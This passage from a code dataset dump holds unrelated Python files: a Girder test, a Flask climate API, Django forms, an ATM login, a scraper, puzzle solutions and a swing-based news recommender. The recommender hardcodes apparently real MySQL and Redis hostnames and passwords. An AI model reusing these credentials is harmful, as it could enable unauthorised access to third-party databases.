'Root',\n            'lastName': 'van Klompf',\n            'password': 'secret'\n        }, {\n            'email': 'joe@dev.null',\n            'login': 'joeregular',\n            'firstName': 'Joe',\n            'lastName': 'Regular',\n            
'password': 'secret'\n })\n self.admin, self.user = [self.model('user').createUser(**user)\n for user in users]\n\n def testCreateBasicAttributes(self):\n # Test that the basic attributes are correct\n manifest_doc = Manifest()\n\n tale_id = '12345'\n title = 'Tale Title'\n description = 'Tale description'\n category = 'science'\n version = 4\n image = 'imageURL'\n created = ''\n\n tale= {\n '_id': tale_id,\n 'title': title,\n 'description': description,\n 'category': category,\n 'version': version,\n 'image': image,\n 'created': created\n\n }\n attributes = manifest_doc.create_basic_attributes(tale)\n self.assertEqual(attributes['schema:identifier'], tale_id)\n self.assertEqual(attributes['schema:name'], title)\n self.assertEqual(attributes['schema:description'], description)\n self.assertEqual(attributes['schema:category'], category)\n self.assertEqual(attributes['schema:version'], version)\n self.assertEqual(attributes['schema:image'], image)\n\n def testGenerateTaleCreator(self):\n\n first_name = 'First'\n last_name = 'Last'\n email = 'email@anemailserver'\n tale_author = first_name + ' ' +last_name\n tale = {\n 'authors': tale_author\n }\n manifest_doc = Manifest()\n manifest_doc.generate_tale_creator(tale, self.users[0])\n\n self.assertEqual(['schema:givenName'], self.users[0]['firstName'])\n self.assertEqual(['schema:familyName'], self.users[0]['lastName'])\n self.assertEqual(['schema:email'], self.users[0]['email'])\n self.assertEqual(['@id'], tale['_id'])\n\n def testCreatContext(self):\n # Rather than check the contents of the context (subject to change), check that we\n # get a dict back\n manifest_doc = Manifest()\n context = manifest_doc.create_context()\n self.assertEqual(type(manifest_doc), type(dict()))\n\n def testCleanWorkspacePath(self):\n # Test that the Tale ID is removed\n path = 'mydatapath/moredata'\n tale_id = '123456'\n res = clean_workspace_path(tale_id, path+tale_id)\n self.assertEqual(res, path)\n\n# def testManifestGeneration(self):\n# manifest_doc = Manifest(license,)\n\n\n# manifest_doc.generate_manifest(self.users[0], tale)\n\n\n def tearDown(self):\n self.model('user').remove(self.user)\n self.model('user').remove(self.admin)\n super(ManifestTestCase, self).tearDown()\n\n","sub_path":"plugin_tests/manifest_test.py","file_name":"manifest_test.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"574143617","text":"import numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\nimport datetime as dt\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\nsession = Session(engine)\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef welcome():\n session = Session(engine)\n\n # Query all prcp data\n last_date = 
session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n first_date = session.query(Measurement.date).order_by(Measurement.date).first()\n session.close()\n \n \"\"\"List all available api routes.\"\"\"\n return (\n f\"SQLAlchemy Homework - Surfs Up!
\"\n f\"Step 2- Climate App
\"\n f\"
\"\n f\"Available Routes:
\"\n f\"/api/v1.0/precipitation
\"\n f\"/api/v1.0/stations
\"\n f\"/api/v1.0/tobs
\"\n f\"/api/v1.0/YYYY-MM-DD
\"\n f\"/api/v1.0/YYYY-MM-DD/YYYY-MM-DD
\"\n f\"
\"\n f\"Please note the following for query on date.
\"\n f\"Date format: YYYY-MM-DD
\"\n f\"First: based on start date only
\"\n f\"
\"\n f\"Route based on start date:
\"\n f\"/api/v1.0/YYYY-MM-DD
\"\n f\"Change YYYY-MM-DD with the date you selected
\"\n f\"
\"\n f\"Second: based on start date and end date
\"\n f\"First YYYY-MM-DD after /v1.0 is for start date.
\"\n f\"Last YYYY-MM-DD is for end date.
\"\n f\"
\"\n f\"Route based on start date and end date:
\"\n f\"/api/v1.0/YYYY-MM-DD/YYYY-MM-DD
\"\n f\"Change both YYYY-MM-DD with the date you selected.
\"\n f\"
\"\n f\"Please select between {first_date[0]} and {last_date[0]}\"\n )\n\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precip():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all prcp data\n results = session.query(Measurement.date, Measurement.prcp).all()\n\n session.close()\n\n # Create a dictionary from the row data and append to a list \n weather_data = []\n for date, prcp in results:\n weather_dict = {}\n weather_dict[\"date\"] = date\n weather_dict[\"prcp\"] = prcp\n weather_data.append(weather_dict)\n\n return jsonify(weather_data)\n\n@app.route(\"/api/v1.0/stations\")\ndef station():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all prcp data\n results = session.query(Station.station, Station.name, Station.latitude , Station.longitude , Station.elevation).all()\n\n session.close()\n\n # Create a dictionary from the row data and append to a list \n stations_data = []\n for station, name, latitude, longitude, elevation in results:\n stations_dict = {}\n stations_dict[\"station\"] = station\n stations_dict[\"name\"] = name\n stations_dict[\"latitude\"] = latitude\n stations_dict[\"longitude\"] = longitude\n stations_dict[\"elevation\"] = elevation\n stations_data.append(stations_dict)\n\n return jsonify(stations_data)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all prcp data\n last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n\n lastdate_yr = int(last_date[0].split('-')[0])\n lastdate_mth = int(last_date[0].split('-')[1])\n lastdate_day = int(last_date[0].split('-')[2])\n \n from dateutil.relativedelta import relativedelta\n a_year_ago = dt.date(lastdate_yr, lastdate_mth, lastdate_day) - relativedelta(years=1)\n \n #results = session.query(Measurement.date, Measurement.tobs).all()\n results = session.query(Measurement.date, Measurement.tobs).filter(Measurement.date >= a_year_ago).all()\n \n session.close()\n\n # Create a dictionary from the row data and append to a list \n temperature_data = []\n for date, tobs in results:\n temp_dict = {}\n temp_dict[\"date\"] = date\n temp_dict[\"tobs\"] = tobs\n temperature_data.append(temp_dict)\n\n return jsonify(temperature_data)\n\n@app.route(\"/api/v1.0/\")\ndef startdate(start):\n \"\"\"When given the start only, calculate TMIN, TAVG, and TMAX for all dates greater than and equal to the start date.\"\"\"\n last_date = session.query(Measurement.date).order_by(Measurement.date.desc()).first()\n \n All_temps = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs ), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= last_date[0]).all()\n \n session.close()\n\n return jsonify(All_temps)\n\n return jsonify({\"error\": f\"No Data for selected start date.\"}), 404\n\n@app.route(\"/api/v1.0//\")\ndef startend(start,end):\n \"\"\"When given the start and the end date, calculate the TMIN, TAVG, and TMAX for dates between the start and end date inclusive.\"\"\"\n \n All_temps = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).\\\n filter(Measurement.date >= start).filter(Measurement.date <= end).all()\n \n session.close()\n\n return jsonify(All_temps)\n\n return jsonify({\"error\": f\"No Data for selected start date.\"}), 404\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"HW10 
SQLAlchemy-Challenge/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"355170066","text":"from django.urls import path, include\nfrom rest_framework import routers\n\nfrom .views import MailboxViewSet, EmailViewSet, TemplateViewSet\n\napp_name = \"api\"\n\nrouter = routers.DefaultRouter()\nrouter.register('mailbox', MailboxViewSet)\nrouter.register('template', TemplateViewSet)\nrouter.register('email', EmailViewSet)\n\n\nurlpatterns = [\n path(\"\", include(router.urls)),\n]\n","sub_path":"email_api/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"552895735","text":"#!/usr/bin/env python3\n# author:Alnk(李成果)\nimport os\nfrom atm.conf.settings import user_info_path, log_path\nfrom atm.core.basic import Basic\nfrom atm.core.log import get_logger\n\nclass Login(Basic): # 认证类\n\n def login(self, name=None, pwd=None):\n if name==None and pwd==None:\n name = input('卡号用户名>>>')\n pwd = input('密码>>>')\n file_path = os.path.join(user_info_path, '%s.json' % name)\n if os.path.isfile(file_path):\n user_dict = self.read_dict(file_path)\n else:\n print('账号或者密码错误!')\n return False\n if name == user_dict['name'] and pwd == user_dict['pwd'] and user_dict['state'] == 1:\n user_log_path = os.path.join(log_path, '%s.log' % name)\n log_msg = '卡号[%s]登录成功!' % name\n get_logger(user_log_path, log_msg) # 写入日志\n print('登录成功!\\n')\n return user_dict\n else:\n print('登录失败,联系管理员')\n return False\n","sub_path":"08 day08/03 作业 day08/atm/core/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"260348646","text":"from urllib import request\nfrom bs4 import BeautifulSoup as bs\n\n#获取网站文本标签\nresp=request.urlopen(\"http://www.136book.com/\")\nhtml_data= resp.read().decode('utf-8')\n\n#解析html标签\nsoup=bs(html_data,'html.parser')\n\nbook=soup.find('div',id='digg_list')\nbook_ul=book.find('ul')\nbook_list=book_ul.find_all('li')\n\nbook_hot_show=[]\nprint(\"热门小说推荐:\")\nfor item in book_list:\n dict={}\n dict['链接'] = item.find('a')['href']\n dict['书名']=item.find('img')['title']\n print(dict)\n book_hot_show.append(dict)\n\nbook=soup.find('div',id='newly_list')\nbook_ul=book.find('ul')\nbook_list=book_ul.find_all('li')\n\nbook_new_show=[]\nprint(\"最新小说推荐:\")\nfor item in book_list:\n dict={}\n dict['链接'] = item.find('a')['href']\n dict['书名']=item.find('img')['title']\n print(dict)\n book_new_show.append(dict)","sub_path":"No11/ex11.py","file_name":"ex11.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"85253882","text":"from django import forms\r\nfrom apps.valida_plan.models import Ges_Observaciones, Ges_Controlador, Ges_Jefatura\r\nfrom apps.actividades.models import Ges_Actividad\r\nfrom django.contrib.auth.models import User\r\nfrom apps.jefaturas.models import Ges_Jefatura\r\n\r\n\r\n\r\nclass RechazaPlanUpdateForm(forms.ModelForm):\r\n\r\n class Meta:\r\n model = Ges_Controlador\r\n\r\n fields = [\r\n 'estado_flujo',\r\n # 'jefatura_segundarevision'\r\n ]\r\n\r\n widgets = {\r\n\r\n 'estado_flujo': forms.TextInput(attrs={'class': 'form-control'}),\r\n # 'jefatura_segundarevision': forms.TextInput(attrs={'class': 'form-control'}),\r\n 
}\r\n\r\n#############################################################################################################\r\n#############################################################################################################\r\n#############################################################################################################\r\n\r\n\r\nclass ValidaPlanObservacionesForm(forms.ModelForm):\r\n\r\n class Meta:\r\n model = Ges_Observaciones\r\n\r\n fields = [\r\n 'observacion',\r\n\r\n ]\r\n widgets = {\r\n\r\n 'observacion': forms.Textarea(attrs={'class': 'form-control' , 'style':'width:535px; '}),\r\n\r\n }\r\n\r\n\r\nclass ObservacionForm(forms.ModelForm): #Class agregada por JR - OK\r\n def __init__(self, id_user, *args, **kwargs):\r\n self.request = kwargs.pop('request', None)\r\n super(ObservacionForm, self).__init__(*args, **kwargs)\r\n self.fields['user_observa'].queryset = User.objects.filter(id=id_user)\r\n\r\n\r\n class Meta:\r\n model = Ges_Observaciones\r\n\r\n fields = [\r\n 'fecha_registro',\r\n 'user_observa',\r\n 'observacion',\r\n\r\n ]\r\n widgets = {\r\n\r\n 'fecha_registro': forms.DateTimeInput(attrs={'class': 'form-control','style':'width:535px;','readonly':'True'}),\r\n 'user_observa': forms.Select(attrs={'class': 'form-control','style':'width:535px;','readonly':'True'}),\r\n 'observacion': forms.Textarea(attrs={'class': 'form-control' , 'style':'width:535px;','readonly':'True'}),\r\n\r\n }\r\n\r\nclass ValidaPlanUpdateForm(forms.ModelForm):\r\n\r\n def __init__(self,nivel_jefatura, *args, **kwargs):\r\n self.request = kwargs.pop('request', None)\r\n super(ValidaPlanUpdateForm, self).__init__(*args, **kwargs)\r\n\r\n self.fields['jefatura_segundarevision'].queryset = Ges_Jefatura.objects.filter(id_nivel_id=nivel_jefatura)\r\n\r\n\r\n\r\n\r\n\r\n class Meta:\r\n model = Ges_Controlador\r\n fields = [\r\n\r\n 'estado_flujo',\r\n 'id_jefatura',\r\n 'jefatura_segundarevision',\r\n 'nivel_inicial'\r\n\r\n ]\r\n\r\n widgets = {\r\n\r\n 'estado_flujo': forms.Select(attrs={'class': 'form-control', 'readonly':'readonly'}),\r\n 'jefatura_segundarevision': forms.Select(attrs={'class': 'form-control'}),\r\n\r\n 'id_jefatura': forms.Select( attrs={'class': 'form-control', 'readonly':'readonly'}),\r\n\r\n }\r\n\r\n\r\nclass Valida_plan_DetalleForm(forms.ModelForm):\r\n\r\n class Meta:\r\n model = Ges_Actividad\r\n fields = [\r\n\r\n 'id_periodicidad',\r\n 'horas_actividad',\r\n 'volumen',\r\n 'personas_asignadas',\r\n 'total_horas',\r\n 'id_producto_estadistico',\r\n 'id_estado_actividad',\r\n\r\n\r\n ]\r\n\r\n widgets = {\r\n\r\n 'id_producto_estadistico': forms.Select(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'id_periodicidad': forms.Select(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'horas_actividad': forms.TextInput(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'volumen': forms.TextInput(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'personas_asignadas': forms.TextInput(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'total_horas': forms.TextInput(attrs={'class': 'form-control', 'readonly': 'readonly'}),\r\n 'id_estado_actividad': forms.Select(attrs={'class': 'form-control'}),\r\n\r\n\r\n }\r\n","sub_path":"apps/valida_plan/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"135598821","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\n@File 
: swing_online.py\n@Author : shijun\n@Contact : shijunwu@whu.edu.cn\n@Modify Time : 2023/3/29 6:41 下午\n@Description : None\n\"\"\"\nimport time\n\nimport pymysql\nfrom itertools import combinations\nimport pandas as pd\nfrom tqdm import tqdm\nimport redis\n\n\ndef get_train_data():\n host = 'rm-gw8lgrwcb14316o05.mysql.germany.rds.aliyuncs.com'\n db = pymysql.connect(host=host, user='eagleee', password='Fyt98Zi76rtsW2')\n cursor = db.cursor()\n sql = '''\n select *\n from scooper_bi.user_action_statistic_recommend\n '''\n print(sql)\n cursor.execute(sql)\n # 拿到表头\n des = cursor.description\n title = [each[0] for each in des]\n print(title)\n # 获取所有记录列表\n results = cursor.fetchall()\n # 保存成dataframe\n df_ori = pd.DataFrame(results, columns=title)\n df_ = df_ori\n # ======================\n df_['user_id'] = df_.index\n print(\"data num: \", df_.shape)\n print(df_.head())\n df_['news_id'] = df_[['news_ids']].applymap(lambda x:x.split(\",\"))\n # df_['len'] = df_[['news_ids']].applymap(lambda x:len(x))\n # df_ = df_[df_['len'] > 200]\n print(\"data num: \", df_.shape)\n df_ = df_[['user_id', 'news_id']].explode(\"news_id\")\n # ======================\n # df_['news_ids'] = df_[['news_ids']].applymap(lambda x: x.split(\",\"))\n # df_ = df_[['dpid', 'news_ids']].explode(\"news_ids\")\n # df_.rename(columns={'dpid': 'user_id', 'news_ids': 'news_id'}, inplace=True)\n # ======================\n print(\"data num: \", df_.shape)\n print(df_.head())\n return df_\n\n\ndef get_uitems_iusers(df):\n u_i = df.groupby('user_id')['news_id'].agg(set)\n u_i = u_i[u_i.apply(lambda x: len(x) >= user_news_series_len_min)]\n u_items = dict(u_i)\n i_u = df.groupby('news_id')['user_id'].agg(set)\n i_u = i_u[i_u.apply(lambda x: len(x) >= item_user_series_min)]\n i_users = dict(i_u)\n # 如何将series转���为字典\n return u_items, i_users # dict(x): pd.Series to dict\n\n\ndef get_data(user_news_series_len_min=1, item_user_series_min=1):\n host = 'rm-gw8lgrwcb14316o05.mysql.germany.rds.aliyuncs.com'\n db = pymysql.connect(host=host, user='eagleee', password='Fyt98Zi76rtsW2')\n cursor = db.cursor()\n sql = '''\n select *\n from scooper_bi.user_action_statistic_recommend\n '''\n print(sql)\n cursor.execute(sql)\n # 拿到表头\n des = cursor.description\n title = [each[0] for each in des]\n print(title)\n # 获取所有记录列表\n results = cursor.fetchall()\n # 保存成dataframe\n df_ori = pd.DataFrame(results, columns=title)\n df_ = df_ori\n df_['user_id'] = df_.index\n print(df_.head())\n print(\"data num: \", df_.shape)\n df_['news_id'] = df_[['news_ids']].applymap(lambda x: x.split(\",\"))\n print(df_.head())\n print(\"data num: \", df_.shape)\n df = df_[['user_id', 'news_id']].explode(\"news_id\")\n u_i = df.groupby('user_id')['news_id'].agg(set)\n u_i = u_i[u_i.apply(lambda x: len(x) >= user_news_series_len_min)]\n u_items = dict(u_i)\n i_u = df.groupby('news_id')['user_id'].agg(set)\n i_u = i_u[i_u.apply(lambda x: len(x) >= item_user_series_min)]\n i_users = dict(i_u)\n # 如何将series转换为字典\n return u_items, i_users # dict(x): pd.Series to dict\n\n\ndef swing_model_old(u_items, i_users):\n print(\"用户数量 len(u_items.keys()): \", len(u_items.keys()))\n print(\"新闻数量 len(i_users.keys()): \", len(i_users.keys()))\n item_pairs = list(combinations(i_users.keys(), 2)) # 全排列组合对\n print(\"新闻对数量 len(item_pairs): \", len(item_pairs))\n item_sim_dict = dict()\n for (i, j) in tqdm(item_pairs): # 这一步需要计算所有的item_i和item_j的相似度,非常耗时,速度慢\n user_pairs = list(combinations(i_users[i] & i_users[j], 2)) # item_i和item_j对应的user取交集后组合 得到user对\n result = 0\n for (u, v) in 
user_pairs:\n result += 1 / (alpha + list(u_items[u] & u_items[v]).__len__()) # 分数公式\n if result != 0:\n item_sim_dict.setdefault(i, dict()) # 如果没有key i,则添加键值对{ i : dict() }\n item_sim_dict[i][j] = format(result, '.3f') # i的字典中添加键值对{j: 0.2741}。保存物品i和物品j的相似度\n item_sim_dict.setdefault(j, dict())\n item_sim_dict[j][i] = format(result, '.3f')\n return item_sim_dict\n\n\ndef swing_model(u_items, i_users):\n item_sim_dict = dict()\n item_id_list = list(i_users.keys())\n item_num = len(item_id_list)\n print(\"用户数量 len(u_items.keys()): \", len(u_items.keys()))\n print(\"新闻数量 len(i_users.keys()): \", len(i_users.keys()))\n # 这一步需要计算所有的item_i和item_j的相似度,非常耗时,速度慢, 全排列组合对\n for i_in in tqdm(range(item_num)):\n for j_in in range(i_in + 1, item_num):\n i = item_id_list[i_in]\n j = item_id_list[j_in]\n user_pairs = list(combinations(i_users[i] & i_users[j], 2)) # item_i和item_j对应的user取交集后组合 得到user对\n result = 0\n for (u, v) in user_pairs:\n Wu = pow(len(u_items[u]) + 5, -0.35)\n Wv = pow(len(u_items[v]) + 5, -0.35)\n Wpair = Wu * Wv\n result += Wpair / (alpha + list(u_items[u] & u_items[v]).__len__()) # 分数公式\n if result != 0:\n item_sim_dict.setdefault(i, dict()) # 如果没有key i,则添加键值对{ i : dict() }\n item_sim_dict[i][j] = format(result, '.3f') # i的字典中添加键值对{j: 0.2741}。保存物品i和物品j的相似度\n item_sim_dict.setdefault(j, dict())\n item_sim_dict[j][i] = format(result, '.3f')\n return item_sim_dict\n\n\ndef get_top_k(item_sim_dict, top_k=3): # 与item相似的前 k 个item\n print(\"输出每个物品的最相似的top-k个物品,以及对应的相似度\")\n new_item_sim_dict = dict()\n for item, sim_items in item_sim_dict.items():\n new_item_sim_dict.setdefault(item, dict())\n new_item_sim_dict[item] = dict(\n sorted(sim_items.items(), key=lambda k: k[1], reverse=True)[:top_k]) # 排序取出 top_k个相似的item\n return new_item_sim_dict\n\n\ndef save2redis(data_):\n # 将数据存储到Redis中\n pool = redis.ConnectionPool(host='r-gw8f128338c863d4.redis.germany.rds.aliyuncs.com',\n password='HLwrFv4lpXemqHqY',\n port=6379,\n db=8)\n r = redis.Redis(connection_pool=pool)\n for item, sim_items in data_.items():\n # 将数据存储到Redis中\n sim_items = \",\".join([str(k) + \":\" + str(v) for k, v in sim_items.items()])\n r.set(item, sim_items, ex=60 * 60 * 24 * 15)\n\n\nif __name__ == '__main__':\n print('扛起大刀向前冲!!!')\n \"\"\"\n 启动定时任务 \n [root@engine-172-20-16-2 swing]# crontab -l # 展示有哪些定时任务\n 00 */4 * * * cd /root/swing && /usr/local/bin/python3 swing.py\n [root@engine-172-20-16-2 swing]# \n [root@engine-172-20-16-2 swing]# crontab -e # 编辑定时任务\n \"\"\"\n alpha = 1 # 平滑因子\n user_news_series_len_min = 10\n item_user_series_min = 20\n u_items, i_users = get_data(user_news_series_len_min, item_user_series_min)\n print(\"u_items:\", len(u_items))\n print(\"i_users: \", len(i_users))\n\n item_sim_dict = swing_model(u_items, i_users)\n print(len(item_sim_dict))\n\n res_item_sim_dict = get_top_k(item_sim_dict, top_k=30)\n\n save2redis(res_item_sim_dict)\n\n # for item, sim_items in res_item_sim_dict.items():\n # print(item, sim_items)\n # print(item, \",\".join([str(k) + \":\" +str(v) for k,v in sim_items.items()]))\n # print()\n # time.sleep(1)\n\n\n","sub_path":"trrassion/recall/swing/swing_online.py","file_name":"swing_online.py","file_ext":"py","file_size_in_byte":7907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"70753940","text":"'''\n \tAuthor :- Tanay Kulkarni\n\tDate :- 5-5-2021\n\tTime :- 18:22:59.805116\n\tName :- solve.py\n''' \nfrom random import *\ndef debug(*a):\n\tprint(a)\ndef read(typ = str):\n\treturn typ(input())\ndef 
read_arr(typ):\n\treturn list(map(typ,input().split()))\n \ndef solve():\t\n\tn = read(int)\n\ts = read()\n\tfor i in range(n):\n\t\tok = False\n\t\tfor j in range(n-1,i,-1):\n\t\t\tif s[j] == s[i]:\n\t\t\t\tok = True\n\t\t\tif s[j] != s[i] and ok:\n\t\t\t\tprint(\"NO\")\n\t\t\t\treturn\n\tprint(\"YES\")\nt = read(int)\nfor i in range(1,t+1):\n\t\t#print(\"Case #{}:\".format(i),end=' ')\n\t\tsolve()\n","sub_path":"codeforces/719/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"576442908","text":"import re\nimport numpy as np\n\nifile = open(\"AOTC2015_6.txt\",'r')\nfileLines = []\n\nfor line in ifile:\n fileLines.append(line.rstrip())\n \nifile.close() \n \ntheGrid = np.zeros((1000,1000))\n\n\ninstruct = \"\"\ncords = \"\"\ncord1 = \"\"\ncord2 = \"\" \n\n\ndef toggle(grid, startX, startY, endX, endY):\n for i in range(int(startX), int(endX)+1):\n for j in range(int(startY), int(endY)+1): \n if grid[i,j] == 1:\n grid[i,j] = 0\n else:\n grid[i,j] = 1\n \n \n return grid \n \ndef turn_off(grid, startX, startY, endX, endY):\n for i in range(int(startX), int(endX)+1):\n for j in range(int(startY), int(endY)+1):\n grid[i,j] = 0\n \n return grid\n \ndef turn_on(grid, startX, startY, endX, endY):\n for i in range(int(startX), int(endX)+1):\n for j in range(int(startY), int(endY)+1):\n grid[i,j] = 1\n \n return grid\n\n \n# turnOnCount = 0\n# turnOffCount = 0\n# toggleCount = 0\n \n \nfor i in fileLines:\n oldI = i\n i = i.replace(\" through \",\" \")\n fileLines[fileLines.index(oldI)] = i\n \n m = re.search('\\d', i)\n instruct = i[:m.start()-1]\n cords = i[m.start():]\n \n cord1, cord2 = cords.split(\" \")\n \n cord1_x = cord1[:cord1.find(',')]\n cord1_y = cord1[cord1.find(',')+1:]\n\n cord2_x = cord2[:cord2.find(',')]\n cord2_y = cord2[cord2.find(',')+1:]\n \n if instruct == \"toggle\":\n theGrid = toggle(theGrid, cord1_x, cord1_y, cord2_x, cord2_y)\n #toggleCount +=1\n elif instruct == \"turn off\":\n theGrid = turn_off(theGrid, cord1_x, cord1_y, cord2_x, cord2_y)\n #turnOffCount +=1\n elif instruct == \"turn on\":\n theGrid = turn_on(theGrid, cord1_x, cord1_y, cord2_x, cord2_y)\n #turnOnCount +=1\n else:\n print(\"THERE WAS AN ISSUE: \"+ instruct+\"}\") \n \nprint(sum(sum(theGrid)))\n\n","sub_path":"2015/AOTC2015_6_1.py","file_name":"AOTC2015_6_1.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"37443748","text":"'''\r\nfaça um algortmo que receba 3 números inteiros e o usuário decida quais das opções o sistema deve retornar:\r\n-a soma dos números\r\n-o maior\r\n-o menor\r\n-a média\r\n'''\r\n\r\nminhaLista = []\r\n\r\n\r\ndef maiorNumero(lista):\r\n lista.sort()\r\n return lista[2]\r\n\r\n\r\ndef menorNumero(lista):\r\n lista.sort()\r\n return lista[0]\r\n\r\n\r\ndef somaNumeros(lista):\r\n return lista[0] + lista[1] + lista[2]\r\n\r\n\r\ndef mediaNumeros(lista):\r\n return (lista[0] + lista[1] + lista[2])/3\r\n\r\n\r\ndef DigiteNumeros():\r\n print(\"Digite três números:\")\r\n numero1 = int(input(\"numero um :\"))\r\n numero2 = int(input(\"numero dois :\"))\r\n numero3 = int(input(\"numero tres :\"))\r\n minhaLista.append(numero1)\r\n minhaLista.append(numero2)\r\n minhaLista.append(numero3)\r\n Escolhas()\r\n\r\n\r\ndef Escolhas():\r\n print(\"Agora escolha o que fazer com os tres numeros:\")\r\n print(\"Selecionar o maior - digite 1\")\r\n print(\"Selecionar o menor - 
type 2\")\r\n    print(\"Compute the average - type 3\")\r\n    print(\"Compute the sum - type 4\")\r\n    escolha = int(input(\"choice : \"))\r\n    if escolha == 1:\r\n        print(\"Largest number = \", maiorNumero(minhaLista))\r\n    if escolha == 2:\r\n        print(\"Smallest number = \", menorNumero(minhaLista))\r\n    if escolha == 3:\r\n        print(\"Average of the numbers = \", mediaNumeros(minhaLista))\r\n    if escolha == 4:\r\n        print(\"Sum of the numbers = \", somaNumeros(minhaLista))\r\n    if escolha > 4 or escolha < 1:\r\n        print(\"Numbers between 1 and 4 must be used\")\r\n        Escolhas()\r\n\r\nDigiteNumeros()\r\n","sub_path":"algoritmo-maior-menor-media-soma.py","file_name":"algoritmo-maior-menor-media-soma.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"80417184","text":"import time\nimport os\nimport psutil\n\n\ndef simple_array():\n    array = [x for x in range(0, 10**6) if x > 0 and type(x) == int]\n    return array\n\n\ndef generation_array():\n    for x in range(0, 10**6):\n        yield x\n\n\ndef comparison_time():\n    start = time.perf_counter()  # time.clock() was removed in Python 3.8\n    simple_array()\n    end = time.perf_counter()\n    time_result_simple = end - start\n    print(\"Time to build the plain list: \", time_result_simple)\n\n    start = time.perf_counter()\n    generation_array()\n    end = time.perf_counter()\n    time_result_generation = end - start\n    print(\"Time to create the generator: \", time_result_generation)\n\n    print(\"The generator is {} faster than the plain list\".format(time_result_simple - time_result_generation))\n\n\ndef comparison_gen():\n    simple_proc_start = psutil.Process(os.getpid())\n    simple_start_memory = simple_proc_start.memory_info().rss / 10 ** 6\n    simple_array()\n    simple_proc_end = psutil.Process(os.getpid())\n    simple_end_memory = simple_proc_end.memory_info().rss / 10 ** 6\n    memory_result_simple = simple_end_memory - simple_start_memory\n    print(\"Memory used building the plain list: \", memory_result_simple)\n\n    gen_proc_start = psutil.Process(os.getpid())\n    gen_start_memory = gen_proc_start.memory_info().rss / 10 ** 6\n    generation_array()\n    gen_proc_end = psutil.Process(os.getpid())\n    gen_end_memory = gen_proc_end.memory_info().rss / 10 ** 6\n    memory_result_gen = gen_end_memory - gen_start_memory\n    print(\"Memory used creating the generator: \", memory_result_gen)\n\n    print(\"The generator uses {} less memory than the plain list\".format(memory_result_simple - memory_result_gen))\n\n\ncomparison_gen()\ncomparison_time()","sub_path":"gen_list.py","file_name":"gen_list.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"306308164","text":"import pygame\r\nimport random\r\n\r\n########################################################################################################################\r\n################################################## Game Setup ##########################################################\r\n########################################################################################################################\r\n\r\npygame.init()\r\n\r\n# Aspect ratio\r\nxDisplay = 800\r\nyDisplay = 600\r\n\r\n# Game sounds\r\nsquishSound = pygame.mixer.Sound(\"squish.wav\")\r\ncrashSound = pygame.mixer.Sound(\"crash.wav\")\r\ngameMusic = pygame.mixer.music.load(\"chicken_dance.wav\")\r\n\r\n# Game art\r\ngameDisplay = pygame.display.set_mode((xDisplay, yDisplay))\r\npygame.display.set_caption(\"Chicken Chaser\")\r\ngameIcon = 
